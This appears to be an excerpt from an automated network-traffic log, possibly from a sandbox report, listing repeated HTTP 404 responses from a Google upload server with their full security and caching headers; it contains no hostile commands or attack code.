      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ7Oj6XiMKPrNThbbNvGLq5Ji9066ekkRbzA-wvmisqifUl2t9TUFrdvfYOw4MHfun1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:04 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nBZbLe45NRVS_eqPGpPZ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQZpAqKQTmdyyG3Ej1Rs3p1D3qfZ3MW1VStHJTO1DTfIu42Ez8tzTFlGJ-wZbC4hQ78DGXeHg8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:54 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-1ScqGiQUimKOlJ_kxupGWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT3tmaIRFHm1yhh_0CGmJlVxbmGg9hIDyCfNxN2Bo6ZSpJu1Gumg7YZpR8OOIVWciubContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Mw7qU6iTU6ekF4mlPaJ7nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRdPOs9xyfsFG63nV1mt25njVJ_XT59WnRXpm6j5BWmyRcg7j-WzlRF_bcpyOQ-0ToSCzofaDsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fvE0Sq6ueHzbcP01s4468g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41sDb8myeUXrsEiau_XSe-HqAGpRpVND6K19KJgQyGsrl7sLHVDgrsXjFeCFpzdRs4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uXGAboKZ8zEMWZ9PLcFzyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgToru8h0awP8tiM2VZerbLzFWseOk7Xp5bMiH61jGOOuExvYFa1fswxOUyYIZtSt3X1xr7Rzz4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:03 GMTContent-Security-Policy: script-src 'nonce-SGZ1vJU3G8e20QrjM0lTJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2nk-A7of0RxG9ZcrYhDVmQPlq5XwPjucQIcNmHQk9c6ZXVr-1z2N7BJdrgnrZFgLqiQe-0wwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:05 GMTContent-Security-Policy: script-src 'nonce-l-8onPjgFeRex80tzj8cYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6F1Gqhs39DhXemrL3IGwOBftFnWz0tQcSoD41wiFrlttNK0A2QGt_26RY0rNKsMZmzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-Y5FI-lUMHjDm76mBcQGAJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC55pC5XUPdIHCvhIPJJ0lwtQSua15A-UjuFCv8GWn6kk3Kk06RykxMbtXxSmnNT5LYWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:10 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-XxdxbcX2v9B9FMfbYiw6pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC624ajSIfGzut2cDFCCMVIQXkSYMdtQbco-CWxL5CAuDJpnCF-qnbwNFiOL3Dpo89pYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:12 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-50XjqCsO5A_HWlElcgQjKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT4uuRPg2l-5AiBPijV9u2-_M1B_K0sJ0058W5N0wx43cawg7SM_MehnHfClgFBuGbbwDpEBJMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-egoQtzVXlHtqRHtsB8mn_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQPqmjTMI653FfBuSHtnmV9dS7DUF62QsZBbW9nNns1d9jH811d0OjPRDYY2aW7HqfLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:17 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-7bd134m998viTHqfmd9iKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTGUE6aBXiwHHRZEhZaw0NfkfKO7xp4yRxzRNdcdvEiijTYySwApKRo2-Z4uVLJ3ZpWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-CoCzefY5EMfhb2PjZzv3hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRFG9Q9dl6SJGxuRrgQBsa7EGMaCZon0g3OkiK6-85QRAwRnP3d35BiHa3n7Ctq2RIHnbKsPDAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-73FTCfE98bJZgWptiYil2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSeJj-UZZmMvhmYQ_5I1p16qTU-ZAq6xD7CsExD97nCd9ZruTxNCcstnCYpCdZM8BS8_NORw5wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:23 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-MLY6DPlGitZriuOnXQz50w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; 